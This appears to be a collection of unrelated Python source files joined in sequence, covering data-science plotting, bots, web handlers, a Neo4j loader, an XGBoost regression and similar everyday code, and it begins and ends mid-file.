cax = ax1.matshow(corr_mat_colour_new_space, cmap=cmap, vmin=-1, vmax=1)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig4.colorbar(cax)
plt.title(r'Partial correlation matrix in new orthogonal space')
plt.show()
fig5 = plt.figure()
ax1 = fig5.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(cov_mat_colour_new_space, cmap=cmap)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig5.colorbar(cax)
plt.title(r'Partial covariance matrix in new orthogonal space')
plt.show()
## Plotting post-svd full correlation matrix
full_mock_new_space = pd.DataFrame(used_combined_df @ np.matrix(U))
full_corr_mat_colour_new_space = full_mock_new_space.corr()
fig6 = plt.figure()
ax1 = fig6.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(full_corr_mat_colour_new_space, cmap=cmap, vmin=-1, vmax=1)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig6.colorbar(cax)
plt.title(r'Full correlation matrix in new orthogonal space')
plt.show()
## Testing implementation of using correlation matrix for mass function
## measurements but calculating individual chi-squared measurements for
## rest of the observables
test_data = full_data_arr[0]
test_model = np.random.uniform(size=30) + full_data_arr[0]
test_error = used_err_colour
# Using the correlation matrix ONLY for phi measurements
test_df = used_combined_df[used_combined_df.columns[0:10]]
test_corr_mat_colour = test_df.corr()
test_corr_mat_inv = np.linalg.inv(test_corr_mat_colour.values)
phi_data = test_data[0:10]
phi_model = test_model[0:10]
phi_error = test_error[0:10]
first_term = ((phi_data - phi_model) / (phi_error)).reshape(1,phi_data.size)
third_term = np.transpose(first_term)
# chi_squared is saved as [[value]]
phi_chi_squared = np.dot(np.dot(first_term,test_corr_mat_inv),third_term)[0][0]
other_data = test_data[10:]
other_model = test_model[10:]
other_error = test_error[10:]
other_chi_squared = np.power(((other_data - other_model)/other_error),2)
total_chi_sqared = phi_chi_squared + np.sum(other_chi_squared)
## Testing implementation of using trimmed post-SVD matrix
test_data = full_data_arr[0]
test_model = np.random.uniform(size=30) + full_data_arr[0]
test_df = used_combined_df
corr_mat_colour = test_df.corr()
U, s, Vh = linalg.svd(corr_mat_colour) # columns of U are the eigenvectors
eigenvalue_threshold = np.sqrt(np.sqrt(2/num_mocks))
idxs_cut = []
for idx,eigenval in enumerate(s):
if eigenval < eigenvalue_threshold:
idxs_cut.append(idx)
last_idx_to_keep = min(idxs_cut)-1
eigenvector_subset = np.matrix(U[:, :last_idx_to_keep])
mock_data_df_new_space = pd.DataFrame(test_df @ eigenvector_subset)
test_data_new_space = np.array(np.matrix(test_data) @ eigenvector_subset)[0]
test_model_new_space = np.array(np.matrix(test_model) @ eigenvector_subset)[0]
test_error_new_space = np.sqrt(np.diag(mock_data_df_new_space.cov()))
chi_squared_indiv = np.power(((test_data_new_space - test_model_new_space)/test_error_new_space),2)
total_chi_squared = np.sum(chi_squared_indiv)
################################################################################
# Plotting absolute magnitude vs redshift for eco data with and without buffer #
################################################################################
from cosmo_utils.utils import work_paths as cwpaths
import matplotlib.pyplot as plt
from matplotlib import rc
import pandas as pd
rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']}, size=20)
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('xtick.major', width=2, size=7)
rc('ytick.major', width=2, size=7)
dict_of_paths = cwpaths.cookiecutter_paths()
path_to_raw = dict_of_paths['raw_dir']
catl_file = path_to_raw + "eco/eco_all.csv"
eco_catl = pd.read_csv(catl_file,delimiter=",", header=0)
eco_nobuff = eco_catl.loc[(eco_catl.cz.values >= 3000) &
(eco_catl.cz.values <= 7000)]
eco_buff = eco_catl.loc[(eco_catl.cz.values >= 2530) &
(eco_catl.cz.values <= 7470)]
plt.scatter(eco_buff.cz.values/(3*10**5), eco_buff.absrmag,
label=r'With buffer (2530 $\leq$ cz $\leq$ 7470)',s=3)
plt.scatter(eco_nobuff.cz.values/(3*10**5), eco_nobuff.absrmag,
label=r'Without buffer (3000 $\leq$ cz $\leq$ 7000)',s=3)
plt.gca().invert_yaxis()
plt.hlines(-17.33, 0.008, 0.025, colors='k', ls='--', label='-17.33', lw=3)
plt.hlines(-17, 0.008, 0.025, colors='gray', ls='--', label='-17', lw=3)
plt.legend(prop={'size': 25})
plt.xlabel(r'\boldmath$z$', fontsize=30)
plt.ylabel(r'\boldmath$M_{r}$', fontsize=30)
plt.show()
|
python
|
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from jdcloud_cli.utils import encode
class Printer(object):
@staticmethod
def print_result(resp):
print(encode(json.dumps(resp.__dict__, cls=ErrorEncoder, indent=4, ensure_ascii=False)))
@staticmethod
def print_text(info):
print(info)
class ErrorEncoder(json.JSONEncoder):
def default(self, o):
return o.__dict__
|
python
|
A, B, X = map(int, input().split())
print("YES" if 0 <= X-A <= B else "NO")
|
python
|
from content.models import PopularQuestion
from ..loader import dp
from aiogram import types
from ..utils.filters import starts_with
from ..keyboards.inline import generic
from ..utils.helpers import get_message_one_button
@dp.callback_query_handler(starts_with('FAQ_element'))
async def send_faq_carousel(callback_query: types.CallbackQuery):
# data FAQ_element_{element_id}
data = callback_query.data.split('_')
list_elements = list(PopularQuestion.objects.all())
count_elements = len(list_elements)
if count_elements == 0:
text = get_message_one_button('FAQ нет ни одного вопроса')
markup = generic.inline_button('Назад', 'menu')
else:
element_id = int(data[2])
text = make_post(element_id, list_elements)
markup = make_markup(data, count_elements)
await callback_query.message.edit_text(
text=text, reply_markup=markup)
def make_markup(data, count_elements):
element_id = int(data[2])
callback_prefix = 'FAQ_element'
callback_back_button = 'menu'
markup = generic.inline_carousel(
element_id, count_elements, callback_prefix, callback_back_button
)
return markup
def make_post(element_id, list_objects):
question = list_objects[element_id]
text = f'<b>{question.name}</b>\n\n{question.text}'
return text
|
python
|
# Import required library
import os # To access environment variables
from dotenv import load_dotenv # To load environment variables from .env file
import serial # To connect via the serial port
import time # To sleep for a few seconds
# The thing ID and access token
load_dotenv()
# Start reading the serial port
ser = serial.Serial(port = os.environ['SERIAL'],
baudrate = 9600,
write_timeout = 0)
while True:
print ("im starting")
temp = '1'
ser.write(temp.encode())
print("write1")
time.sleep(5)
temp = '0'
print("write 0")
ser.write(temp.encode())
print("Starting to print")
ser.write('1'.encode())
print("printing 1")
time.sleep(5)
print("printing 0")
ser.write('0'.encode())
time.sleep(2)
|
python
|
from py2neo import Graph,Node,Relationship,Subgraph
graph = Graph('http://localhost:7474',username='neo4j',password='123456')
tx = graph.begin()
# ### 增加
# # 可以一个一个创建
# a = Node('Person',name='bubu')
# graph.create(a)
# b = Node('Person',name='kaka')
# graph.create(b)
# r = Relationship(a,'KNOWS',b)
# graph.create(r)
# # 也可以一次性创建
# s = a | b | r
# graph.create(s)
opera=[]
data={
'person':[
{'id':'0','name':u'恩比德','height':'2.13','age':'23','team':'76人'},
{'id':'1','name':u'科比','height':'1.96','age':'42','team':'湖人'},
{'id':'2','name':u'詹姆斯','height':'2.03','age':'35','team':'湖人'},
{'id':'3','name':u'韦德','height':'1.93','age':'38','team':'热火'},
{'id':'4','name':u'安东尼','height':'2.03','age':'36','team':'尼克斯'},
{'id':'5','name':u'欧文','height':'1.91','age':'29','team':'篮网'},
{'id':'6','name':u'杜兰特','height':'2.11','age':'32','team':'篮网'},
{'id':'7','name':u'戴维斯','height':'2.10','age':'28','team':'湖人'},
{'id':'8','name':u'乔治','height':'2.06','age':'31','team':'快船'},
{'id':'9','name':u'保罗','height':'1.85','age':'34','team':'雷霆'},
{'id':'10','name':u'伦纳德','height':'2.03','age':'33','team':'快船'},
{'id':'11','name':u'哈登','height':'1.98','age':'33','team':'火箭'},
{'id':'12','name':u'库里','height':'1.91','age':'33','team':'勇士'},
{'id':'13','name':u'汤普森','height':'2.03','age':'32','team':'勇士'},
{'id':'14','name':u'格林','height':'1.98','age':'31','team':'勇士'},
{'id':'15','name':u'维斯布鲁克','height':'1.91','age':'30','team':'火箭'}
],
'team':[
{'id':'0','name':'湖人','location':'洛杉矶'},
{'id':'1','name':'热火','location':'迈阿密'},
{'id':'2','name':'快船','location':'洛杉矶'},
{'id':'3','name':'勇士','location':'金州'},
{'id':'4','name':'火箭','location':'休斯顿'},
{'id':'5','name':'尼克斯','location':'纽约'},
{'id':'6','name':'雷霆','location':'俄克拉马荷'},
{'id':'7','name':'篮网','location':'新泽西'},
{'id':'8','name':'76人','location':'费城'},
],
'mvp':[
{'id':'0','year':'2010'},
{'id':'2','year':'2012'},
{'id':'3','year':'2013'},
{'id':'4','year':'2014'},
{'id':'5','year':'2015'},
{'id':'6','year':'2016'},
{'id':'7','year':'2017'},
{'id':'8','year':'2018'}
],
'fmvp':[
{'id':'0','year':'2010'},
{'id':'2','year':'2012'},
{'id':'3','year':'2013'},
{'id':'4','year':'2014'},
{'id':'5','year':'2015'},
{'id':'6','year':'2016'},
{'id':'7','year':'2017'},
{'id':'8','year':'2018'}
],
'relation':[
['p3','brother','p4'],
['p2','brother','p4'],
['p2','brother','p3'],
['p9','brother','p2'],
['p9','brother','p3'],
['p9','brother','p4'],
['p15','brother','p6'],
['p2','sameboth','p12'],
['p1','teacher','p11'],
['p2','teammate','p7'],
['p1','teammate','p2'],
['p5','teammate','p6'],
['p15','work','t4'],
['p14','work','t3'],
['p13','work','t3'],
['p12','work','t3'],
['p11','work','t4'],
['p10','work','t2'],
['p9','work','t6'],
['p8','work','t2'],
['p7','work','t0'],
['p6','work','t7'],
['p5','work','t7'],
['p4','work','t5'],
['p3','work','t1'],
['p2','work','t0'],
['p1','work','t0'],
['p0','work','t8'],
['m0','grant','p2'],
['m2','grant','p2'],
['m3','grant','p2'],
['m4','grant','p6'],
['m5','grant','p12'],
['m6','grant','p12'],
['m7','grant','p15'],
['m8','grant','p11'],
['f0','grant','p1'],
['f2','grant','p2'],
['f3','grant','p2'],
['f4','grant','p10'],
['f5','grant','p12'],
['f6','grant','p2'],
['f7','grant','p6'],
['f8','grant','p6'],
]
}
person='person'
for i,item in enumerate(data[person]):
locals()["p"+item['id']] = Node(person,name='{}'.format(item['name']),height='{}'.format(item['height']),age='{}'.format(item['age']),team='{}'.format(item['team']))
#locals()["p"+item['id']] = Node(person,name='{}'.format(item['name']))
#graph.create(locals()["p"+item['id']])
opera.append(locals()["p"+item['id']])
team='team'
for i,item in enumerate(data[team]):
locals()["t"+item['id']] = Node(team,name='{}'.format(item['name']),location='{}'.format(item['location']))
#r = Node(person,name='{}'.format(item['name']))
#graph.create(locals()["t"+item['id']])
opera.append(locals()["t"+item['id']])
mvp='mvp'
for i,item in enumerate(data[mvp]):
locals()["m"+item['id']] = Node(mvp,name='{}'.format(item['year']))
#r = Node(person,name='{}'.format(item['name']))
#graph.create(locals()["t"+item['id']])
opera.append(locals()["m"+item['id']])
fmvp='fmvp'
for i,item in enumerate(data[fmvp]):
locals()["f"+item['id']] = Node(fmvp,name='{}'.format(item['year']))
#r = Node(person,name='{}'.format(item['name']))
#graph.create(locals()["t"+item['id']])
opera.append(locals()["f"+item['id']])
rela=[]
relation='relation'
for i,item in enumerate(data[relation]):
r = Relationship(locals()[item[0]],item[1],locals()[item[2]])
#r = Node(person,name='{}'.format(item['name']))
#graph.create(r)
rela.append(r)
### 事务
opera=Subgraph(opera,relationships=rela)
tx.create(opera)
tx.commit()
|
python
|
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
import threading
import SocketServer
from tools.tools import is_unsigned_integer
import re
import simplejson
import cgi
# urls:
# - https://docs.python.org/3/glossary.html#term-global-interpreter-lock
# - http://stackoverflow.com/questions/1312331/using-a-global-dictionary-with-threads-in-python
# - http://stackoverflow.com/questions/105095/are-locks-unnecessary-in-multi-threaded-python-code-because-of-the-gil
# - https://docs.python.org/3/library/dis.html#opcode-STORE_SUBSCR
# -> au final, sur des operations "aussi courtes", l'interpreteur python est deja protege.
class LocalDataWithoutMutex(object):
"""
"""
_records = {}
@staticmethod
def get_record(id_record):
"""
"""
return LocalDataWithoutMutex._records[id_record]
@staticmethod
def set_record(id_record, record_):
"""
"""
LocalDataWithoutMutex._records[id_record] = record_
class LocalDataWithMutex(object):
"""
"""
_lock = threading.Lock()
_records = {}
@staticmethod
def get_record(id_record):
"""
Mutex safe (static) method to get a record
:param id_record:
:return:
"""
with LocalDataWithMutex._lock:
record = LocalDataWithMutex._records[id_record]
return record
@staticmethod
def set_record(id_record, record_):
"""
Mutex safe (static) method to set a record
"""
with LocalDataWithMutex._lock:
LocalDataWithMutex._records[id_record] = record_
LocalData = LocalDataWithoutMutex
# LocalData = LocalData_with_Mutex
class HTTPRequestHandler(BaseHTTPRequestHandler, object):
"""
"""
@staticmethod
def get_suffix(prefix, path):
"""
:param prefix:
:param path:
:return:
"""
# urls:
# - https://docs.python.org/2/library/re.html
# - http://stackoverflow.com/questions/12572362/get-a-string-after-a-specific-substring
m = re.search('(?:'+prefix+')(.*)', path)
return m.group(1)
@staticmethod
def get_path_for_POST():
"""
:return:
"""
return 'api/v1/addrecord/'
@staticmethod
def get_path_for_GET():
"""
:return:
"""
return 'api/v1/getrecord/'
@staticmethod
def get_pattern_for_POST():
return HTTPRequestHandler.get_path_for_POST() + '*'
@staticmethod
def get_pattern_for_GET():
return HTTPRequestHandler.get_path_for_GET() + '*'
def _send_response_with_end_headers(self, status_code, msg=None):
"""
:param status_code:
:param msg:
:return:
"""
self.send_response(status_code, msg)
self.send_header('Content-Type', 'application/json')
self.end_headers()
def do_POST(self):
"""
:return:
"""
pattern_for_POST = self.get_pattern_for_POST()
if re.search(pattern_for_POST, self.path) is not None:
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'application/json':
length = int(self.headers.getheader('content-length'))
data = self.rfile.read(length)
# url: http://stackoverflow.com/questions/31371166/reading-json-from-simplehttpserver-post-data
data_json = simplejson.loads(data)
recordID = self.get_suffix(self.get_path_for_POST(), self.path)
LocalData.set_record(recordID, data_json)
self._send_response_with_end_headers(200)
else:
self._send_response_with_end_headers(400, 'Bad Request: support only application/json')
else:
self._send_response_with_end_headers(403,
'Bad Request: wrong path, support only "/api/v1/addrecord/*" for posting')
return
def do_GET(self):
"""
:return:
"""
pattern_for_GET = self.get_pattern_for_GET()
if re.search(pattern_for_GET, self.path) is not None:
recordID = self.get_suffix(self.get_path_for_GET(), self.path)
try:
record = LocalData.get_record(recordID)
self._send_response_with_end_headers(200)
#
self.wfile.write(record)
except KeyError:
self._send_response_with_end_headers(401, "Bad Request: ")
else:
self._send_response_with_end_headers(403, "Bad Request: ")
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""
"""
allow_reuse_address = True
def shutdown(self):
"""
:return:
"""
self.socket.close()
HTTPServer.shutdown(self)
# urls:
# - http://stackoverflow.com/questions/598077/why-does-foo-setter-in-python-not-work-for-me
# - http://stackoverflow.com/a/598090
class SimpleHTTPServer(object):
"""
"""
class SocketError(SocketServer.socket.error):
"""
"""
def __init__(self, message, *args):
"""
:param message:
:param args:
:return:
"""
self.message = message
super(SimpleHTTPServer.SocketError, self).__init__(message, *args)
# url: http://stackoverflow.com/questions/1319615/proper-way-to-declare-custom-exceptions-in-modern-python
class StartError(Exception):
def __init__(self, message, errors):
"""
:param message:
:param errors:
:return:
"""
# Call the base class constructor with the parameters it needs
super(SimpleHTTPServer.StartError, self).__init__(message)
# Now for your custom code...
self.errors = errors
def __init__(self, ip="127.0.0.1", port=8080):
"""
:param ip:
:param port:
:return:
"""
if isinstance(ip, str) and is_unsigned_integer(port):
self._ip = ip
self._port = port
#
self.server_thread = None
self.server = None
#
self._thread_name = ""
else:
raise ValueError
# url: http://stackoverflow.com/questions/2627002/whats-the-pythonic-way-to-use-getters-and-setters
@property
def ip(self):
"""
:return:
"""
return self._ip
@property
def port(self):
"""
:return:
"""
return self._port
@property
def thread_name(self):
"""
:return:
:rtype: str
"""
return self._thread_name
@thread_name.setter
def thread_name(self, value):
"""
:param value:
"""
self._thread_name = value
def acquire(self, class_handler=HTTPRequestHandler):
"""
url: http://stackoverflow.com/questions/19071512/socket-error-errno-48-address-already-in-use
:param classHandler:
"""
try:
self.server = ThreadedHTTPServer((self.ip, self.port), class_handler)
except SocketServer.socket.error, e:
raise SimpleHTTPServer.SocketError(e)
def start(self, thread_name="httpserver_thread"):
"""
:return:
"""
try:
self._thread_name = thread_name
self.server_thread = threading.Thread(target=self.server.serve_forever, name=self._thread_name)
self.server_thread.daemon = True
self.server_thread.start()
except Exception, e:
raise self.StartError("", e)
def wait_for_thread(self):
"""
:return:
"""
self.server_thread.join()
def stop(self):
"""
:return:
"""
self.server.shutdown()
self.wait_for_thread()
if __name__ == '__main__':
server = SimpleHTTPServer("127.0.0.1", 8081)
server.start()
server.wait_for_thread()
|
python
|
def formatString(input):
input = re.sub("\s+", " ", input)
if " " == input[0]:
input = input[1:]
if " " == input[-1]:
input = input[:-1]
return input
|
python
|
# Copyright 2015 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Controllers for the Oppia collection learner view."""
from __future__ import absolute_import
from __future__ import unicode_literals
from core import feconf
from core import utils
from core.controllers import acl_decorators
from core.controllers import base
from core.domain import rights_manager
from core.domain import summary_services
class CollectionPage(base.BaseHandler):
"""Page describing a single collection."""
URL_PATH_ARGS_SCHEMAS = {
'collection_id': {
'schema': {
'type': 'basestring'
}
}
}
HANDLER_ARGS_SCHEMAS = {
'GET': {}
}
@acl_decorators.can_play_collection
def get(self, _):
"""Handles GET requests."""
self.render_template('collection-player-page.mainpage.html')
class CollectionDataHandler(base.BaseHandler):
"""Provides the data for a single collection."""
GET_HANDLER_ERROR_RETURN_TYPE = feconf.HANDLER_TYPE_JSON
URL_PATH_ARGS_SCHEMAS = {
'collection_id': {
'schema': {
'type': 'basestring'
}
}
}
HANDLER_ARGS_SCHEMAS = {
'GET': {}
}
@acl_decorators.can_play_collection
def get(self, collection_id):
"""Populates the data on the individual collection page."""
collection_dict = (
summary_services.get_learner_collection_dict_by_id(
collection_id, self.user,
allow_invalid_explorations=False))
collection_rights = rights_manager.get_collection_rights(
collection_id, strict=False)
self.values.update({
'can_edit': rights_manager.check_can_edit_activity(
self.user, collection_rights),
'collection': collection_dict,
'is_logged_in': bool(self.user_id),
'session_id': utils.generate_new_session_id(),
'meta_name': collection_dict['title'],
'meta_description': utils.capitalize_string(
collection_dict['objective'])
})
self.render_json(self.values)
|
python
|
import scrapy.http.response
class CacheResponse(scrapy.http.response.Response):
is_cache = False
def mark_cache(self):
self.is_cache = True
return self
def judge_cache(self):
if not hasattr(self, 'is_cache'):
return False
return self.is_cache
|
python
|
from django.core.management.base import BaseCommand, CommandError
from coinhub import pullData as myModel
# Run via cron job similar to the form shown below
# * * * * * python manage.py data_grabber --url https://api.coinmarketcap.com/v1/ticker/
class Command(BaseCommand):
help = 'Collects data from an exchange'
def add_arguments(self, parser):
parser.add_argument('--url', type=str)
def handle(self, *args, **options):
exchange_url = options['url']
my_puller = myModel.CoinDataPuller(exchange_url)
my_puller.collect_new_data()
my_puller.save()
|
python
|
import settings
import shutil
def make_cbz():
shutil.make_archive('comic','zip',root_dir=settings.IMAGES_PATH)
shutil.move('comic.zip','comic.cbz')
if __name__ == "__main__":
make_cbz()
|
python
|
from __future__ import absolute_import
import string
from struct import unpack
from vertica_python.vertica.messages.message import BackendMessage
class ParameterStatus(BackendMessage):
def __init__(self, data):
null_byte = string.find(data, '\x00')
unpacked = unpack('{0}sx{1}sx'.format(null_byte - 1, len(data) - null_byte - 1), data)
self.name = unpacked[0]
self.value = unpacked[1]
ParameterStatus._message_id('S')
|
python
|
import torch as to
from torch.distributions.uniform import Uniform
from pyrado.policies.base import Policy
from pyrado.policies.base_recurrent import RecurrentPolicy
from pyrado.utils.data_types import EnvSpec
class IdlePolicy(Policy):
""" The most simple policy which simply does nothing """
name: str = 'idle'
def __init__(self, spec: EnvSpec, use_cuda: bool = False):
"""
Constructor
:param spec: environment specification
:param use_cuda: `True` to move the policy to the GPU, `False` (default) to use the CPU
"""
super().__init__(spec, use_cuda)
def init_param(self, init_values: to.Tensor = None, **kwargs):
pass
def forward(self, obs: to.Tensor = None) -> to.Tensor:
# Observations are ignored
return to.zeros(self._env_spec.act_space.shape)
class DummyPolicy(Policy):
""" Simple policy which samples random values form the action space """
name: str = 'dummy'
def __init__(self, spec: EnvSpec, use_cuda: bool = False):
"""
Constructor
:param spec: environment specification
:param use_cuda: `True` to move the policy to the GPU, `False` (default) to use the CPU
"""
super().__init__(spec, use_cuda)
low = to.from_numpy(spec.act_space.bound_lo)
high = to.from_numpy(spec.act_space.bound_up)
self._distr = Uniform(low, high)
def init_param(self, init_values: to.Tensor = None, **kwargs):
pass
def forward(self, obs: to.Tensor = None) -> to.Tensor:
# Observations are ignored
return self._distr.sample()
class RecurrentDummyPolicy(RecurrentPolicy):
"""
Simple recurrent policy which samples random values form the action space and
always returns hidden states with value zero
"""
name: str = 'rec_cummy'
def __init__(self, spec: EnvSpec, hidden_size: int, use_cuda: bool = False):
"""
Constructor
:param spec: environment specification
:param hidden_size: size of the mimic hidden layer
:param use_cuda: `True` to move the policy to the GPU, `False` (default) to use the CPU
"""
super().__init__(spec, use_cuda)
low = to.from_numpy(spec.act_space.bound_lo)
high = to.from_numpy(spec.act_space.bound_up)
self._distr = Uniform(low, high)
self._hidden_size = hidden_size
@property
def hidden_size(self) -> int:
return self._hidden_size
def init_param(self, init_values: to.Tensor = None, **kwargs):
pass
def forward(self, obs: to.Tensor = None, hidden: to.Tensor = None) -> (to.Tensor, to.Tensor):
# Observations and hidden states are ignored
return self._distr.sample(), to.zeros(self._hidden_size)
|
python
|
#!/usr/bin/env python
# Title : XGB_BostonHousing.py
# Description : After using LinearRegression and GradientBoostingRegressor, we
# can further improve the predicitions with state-of-the-art
# algorithms, like XGBReegressor. It can use regularization and
# better predict correlations on this dataset. We plot RMSE per
# number of Boosters and we also plot the comparative graph of
# Real Prices vs Predicted Prices, with all features importances
# Author : Neves4
# Outputs : Figure with one plot : 'XGBoost RMSE'
# Figure with two plots : 'Predicted prices vs Real Prices'
# 'Importância das variáveis'
# Values : RMSE: 2.0278
# R^2 score: 0.9341
# CV Scores: 0.7756 (+/- 0.2291)
# License : MIT License
#==============================================================================
##### IMPORTING #####
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import xgboost as xgb
from sklearn import datasets, model_selection
from sklearn.metrics import mean_squared_error, r2_score
plt.style.use('ggplot') # Customizando o estilo do matplotlib
##### FUNCTIONS #####
def plot_FeatureImportances(model, X, Y_test, Y_pred):
"""
Plot the Feature Importances of a given model and also the predictions vs
the actual values. This funcion outputs two graphs on the same figure
"""
feature_importances = np.array(model.feature_importances_)
feature_importances = 100*(feature_importances/feature_importances.max())
pos = np.arange(feature_importances.shape[0]) + .5
labels_X = np.array(X.columns.values)
idx = np.argsort(feature_importances)
feature_importances = np.array(feature_importances)[idx]
labels_X = np.array(labels_X)[idx]
plt.figure(figsize=(13, 6))
# 1st graph - plot feature importances and their absolute value
plt.subplot(1, 2, 1)
plt.title('Importância das variáveis')
plt.barh(pos, feature_importances, align='center')
plt.yticks(pos, labels_X)
plt.xlabel('Importância relativa')
plt.tick_params(
axis='both', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
length=0 ) # labels along the bottom edge are off
# 2nd graph - scatter graph that compare estimated vs real prices
plt.subplot(1, 2, 2)
plt.scatter(Y_test, Y_pred, alpha=0.75, label='Índices comparados')
plt.tick_params(
axis='both', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
length=0 ) # labels along the bottom edge are off
legend = plt.legend(loc='upper left', frameon=True, handletextpad=0.1)
legend.get_frame().set_facecolor('white')
plt.xlabel("Índice Real")
plt.ylabel("Índice Estimado")
plt.title("Comparativo entre índices reais e estimados")
plt.tight_layout()
plt.show()
def plot_PerformanceMetrics(model, error_used):
"""
Assess performance metrics from given XGBoost model. It should be evaluated
using RMSE during fit. Example of a model's fit funtion:
eval_set = [(X_train, Y_train), (X_test, Y_test)]
model.fit(X_train, Y_train, early_stopping_rounds = 100,
eval_metric = "rmse", eval_set = eval_set, verbose = True)
"""
results = model.evals_result()
epochs = len(results['validation_0'][error_used])
x_axis = range(0, epochs)
len_space = len(error_used) + 1
title = "".join({'XGBoost', error_used.rjust(len_space).upper()})
# Plot RMSE vs Iterations
fig, ax = plt.subplots()
ax.plot(x_axis, results['validation_0'][error_used], label='Train')
ax.plot(x_axis, results['validation_1'][error_used], label='Test')
legend = ax.legend(loc='upper right', frameon=True)
legend.get_frame().set_facecolor('white')
ax.tick_params(axis = 'both', # changes apply to the x-axis
which = 'both', # major and minor ticks
length = 0) # labels along the bottom edge
plt.ylabel(error_used.upper())
plt.xlabel('Number of estimators')
plt.title(title)
plt.show()
def best_GridSearch(param_grid, X_train, Y_train, X_test, Y_test):
"""
Function to optimize the fit with data. Recommended starting values:
1. max_depth = 5 : This should be between 3-10. I’ve started with 5 but
you can choose a different number as well. 4-6 can be good starting
points.
2. min_child_weight = 1 : A smaller value is chosen because it is a
highly imbalanced class problem and leaf nodes can have smaller size
groups.
3. gamma = 0 : A smaller value like 0.1-0.2 can also be chosen for
starting. This will anyways be tuned later.
4. subsample, colsample_bytree = 0.8 : This is a commonly used used
start value. Typical values range between 0.5-0.9.
5. scale_pos_weight = 1: Because of high class imbalance.
Best order for parameters tuning:
1. Tune n_estimators with eta = 0.1
2. Tune max_depth and min_child_weight
3. Tune gamma
4. Tune subsample and colsample_bytree
5. Tune lambda and alpha
6. Decrease learning_rate while increasing n_estimators proportionally
(cv function)
"""
estimator = xgb.XGBRegressor(n_estimators = 157,
learning_rate = 0.1,
max_depth = 5,
min_child_weight = 2,
gamma = 0.17,
subsample = 0.84,
colsample_bytree = 0.85,
reg_alpha = 0.008,
reg_lamba = 1.200
)
regressor = model_selection.GridSearchCV(estimator=estimator, cv=5,
param_grid=param_grid, verbose = 2)
regressor.fit(X_train, Y_train)
Y_pred = regressor.predict(X_test)
rmse = np.sqrt(mean_squared_error(Y_test, Y_pred))
cv_test = model_selection.cross_val_score(regressor, X_test, Y_test, cv=5)
bestmodel = regressor.best_estimator_
# OK great, so we got back the best estimator parameters as follows:
print ("----------- Best Estimator Parameters -----------")
print (regressor.best_params_)
print ("----------- ACCURACY ASSESSMENT -----------")
print("RMSE: {:.4f}" .format(rmse))
print("CV Scores - Test: {:.4f} (+/- {:.4f})" .format(cv_test.mean(),\
cv_test.std() * 2))
return bestmodel
##### DECLARING AND TRAINING #####
# Carregamento do dataset do boston, conversão para o framework pandas e como a
# nomenclatura não é automática, foi dado valor às colunas da tabela do pandas.
# Para verificar como estão os dados, chamar print(boston_pd.head())
boston = datasets.load_boston()
boston_pd = pd.DataFrame(boston.data)
boston_pd.columns = boston.feature_names
# É necessária então a divisão dos datasets, pelo método train_test_split. Para
# encontrar o tamanho de cada tensor que foi dividido, print(X_train.shape)
X, Y = boston_pd, boston.target
X_train, X_test, Y_train, Y_test = model_selection.train_test_split(X, Y,\
test_size = 0.1, random_state = 42)
# ##### OPTIMIZATION OF THE MODEL #####
# param_grid = {'reg_lambda': [i/100.0 for i in range(115,125)]#,
# #'colsample_bytree': [i/100.0 for i in range(78,87)]
# # between 0,1 : [i/10.0 for i in range(6,10)]
# # greater than 1 : range(2,10,2)
# }
# best_est = best_GridSearch(param_grid, X_train, Y_train, X_test, Y_test)
# O método para fit dos dados do Boston serão os de Linear Regression
eval_set = [(X_train, Y_train), (X_test, Y_test)]
params = {'learning_rate': 0.0503,
'n_estimators': 5000,
'max_depth': 5,
'min_child_weight': 2,
'gamma': 0.17,
'subsample': 0.84,
'colsample_bytree': 0.85,
'reg_alpha': 0.008,
'reg_lambda': 1.200,
'scale_pos_weight': 1,
'seed': 42}
xgb1 = xgb.XGBRegressor(**params)
print("------- FITTING XGBOOST -------")
xgb1.fit(X_train, Y_train, early_stopping_rounds = 100, eval_metric = "rmse",
eval_set = eval_set, verbose = 100)
Y_pred = xgb1.predict(X_test)
##### ERROR #####
# Encontra o MSE, que será o benchmark para este algoritmo, para identificar
# quão boa foi sua aproximação
r2_score = r2_score(Y_test, Y_pred)
rmse = np.sqrt(mean_squared_error(Y_test, Y_pred))
cv_scores = model_selection.cross_val_score(xgb1, X_test, Y_test, cv=5)
print("------- ACCURACY ASSESSMENT -------")
print("RMSE: {:.4f}" .format(rmse))
print("R^2 score: {:.4f}" .format(r2_score))
print("CV Scores: {:.4f} (+/- {:.4f})" .format(cv_scores.mean(),\
cv_scores.std() * 2))
##### PLOTS #####
# Plot outputs using scatter. Ticks are diabled and everything else is the clea-
# nest that I could. The 1st graph - Featura Importances normalized with the
# highest value. Useful function here is print ("Feature Importances")
plot_PerformanceMetrics(xgb1, 'rmse')
plot_FeatureImportances(xgb1, X, Y_test, Y_pred)
|
python
|
import pytest
from pandas import Timedelta
@pytest.mark.parametrize('td, expected_repr', [
(Timedelta(10, unit='d'), "Timedelta('10 days 00:00:00')"),
